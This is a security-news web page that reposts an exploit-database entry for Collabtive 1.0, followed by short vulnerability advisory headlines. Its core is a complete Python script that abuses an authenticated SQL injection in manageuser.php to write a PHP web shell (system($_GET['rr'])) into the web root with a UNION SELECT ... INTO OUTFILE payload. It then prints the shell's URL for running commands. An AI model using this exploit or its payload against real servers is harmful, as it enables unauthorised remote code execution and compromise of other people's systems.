The goal of this project is to make virtual world a safer and better place without child pornography, major computer crime and RIAA.
Login As
You can log in if you are registered at one of these services:
Security Bulletins
Latest Malware Updates

Infostealer.Posteal

02/26/2015

Downloader.Busadom

02/26/2015

Trojan.Ladocosm

02/26/2015

SONAR.SuspDocRun

02/25/2015

SONAR.SuspHelpRun

02/25/2015
06/24/2013

Collabtive 1.0 (manageuser.php, task param) - SQL Injection Vulnerability

# Exploit Title: Collabtive 1.0 SQLi
# Date: 06/17/2013
# Exploit Author: drone (@dronesec)
# More information: http://forelsec.blogspot.com/2013/06/collabtive-10-sqli.html
# Vendor homepage: http://collabtive.o-dyn.de/
# Software link: http://downloads.sourceforge.net/project/collabtive/collabtive/1.0/collabtive-10.zip
# Version: 1.0
# Fixed In: https://github.com/philippK-de/Collabtive
# Tested on: Ubuntu 12.04 (apparmor disabled)

""" Collabtive 1.0 SQL injection web shell

    Requires authenticated user.
"""
from argparse import ArgumentParser
import string
import random
import urllib, urllib2
import sys

def run(options):
    print '[!] Dropping web shell on %s...'%options.ip

    shell = ''.join(random.choice(string.ascii_lowercase+string.digits) for x in range(5))

    # <? php system($_GET["rr"]); ?>
    exploit = '{0}%20UNION%20SELECT%200x3c3f7068702073797374656d28245f4745545b227272225d293b3f3e'\
              '%20INTO%20OUTFILE%20\'{1}/{2}.php\''.format(options.task,options.path,shell)

    query_string = 'action=profile&id={0}&project={1}&task={2}'.format(options.id,options.project,
                                                                        exploit)
    request = urllib2.build_opener()
    request.addheaders.append(('Cookie', 'PHPSESSID=%s'%options.session.strip()))

    try:
        request.open('http://{0}{1}/manageuser.php?{2}'.format(
                                                options.ip, options.rootp,query_string))
    except: pass
    print '[!] Shell dropped.  http://{0}{1}/{2}.php?rr=ls'.format(options.ip, options.rootp, shell)
def parse():
    parser = ArgumentParser()
    parser.add_argument("-i", help='server address', action='store', dest='ip', required=True)
    parser.add_argument('-P', help='valid php session id', action='store',
                        dest='session', required=True)
    parser.add_argument("-p", help='path to manageuser.php (/collabtive)',action='store',
                        default='/collabtive', dest='rootp')
    parser.add_argument("-w", help="writable web path (/var/www/collabtive)",action='store',
                        default='/var/www/collabtive', dest='path')
    parser.add_argument('--id', help='collab id (1)', action='store', default=1, dest='id')
    parser.add_argument('--project', help='project id (1)', action='store', default=1,
                        dest='project')
    parser.add_argument('--task', help='task id (1)', action='store', default=1,
                        dest='task')

    options = parser.parse_args()
    options.path = options.path if options.path[-1] != '/' else options.path[:-1]
    options.rootp = options.rootp if options.rootp[-1] != '/' else options.rootp[:-1]
    return options

if __name__=="__main__":
    run(parse())

Security Advisories Database

Remote Code Execution Vulnerability in Microsoft OpenType Font Driver

A remote attacker can execute arbitrary code on the target system.

07/21/2015

SQL Injection Vulnerability in Piwigo

SQL inection vulnerability has been discovered in Piwigo.

02/05/2015

Cross-site Scripting Vulnerability in DotNetNuke

A cross-site scripting (XSS) vulnerability has been discovered in DotNetNuke.

02/05/2015

Cross-site Scripting Vulnerability in Hitachi Command Suite

A cross-site scripting vulnerability was found in Hitachi Command Suite.

02/02/2015

Denial of service vulnerability in FreeBSD SCTP RE_CONFIG Chunk Handling

An attacker can perform a denial of service attack.

01/30/2015

Denial of service vulnerability in Apache Traffic Server HTTP TRACE Max-Forwards

An attacker can perform a denial of service attack.

01/30/2015

Denial of service vulnerability in MalwareBytes Anti-Exploit &quot;mbae.sys&quot;

An attacker can perform a denial of service attack.

01/30/2015

Denial of service vulnerability in Linux Kernel splice

An attacker can perform a denial of service attack.

01/29/2015

Denial of service vulnerability in Python Pillow Module PNG Text Chunks Decompression

An attacker can perform a denial of service attack.

01/20/2015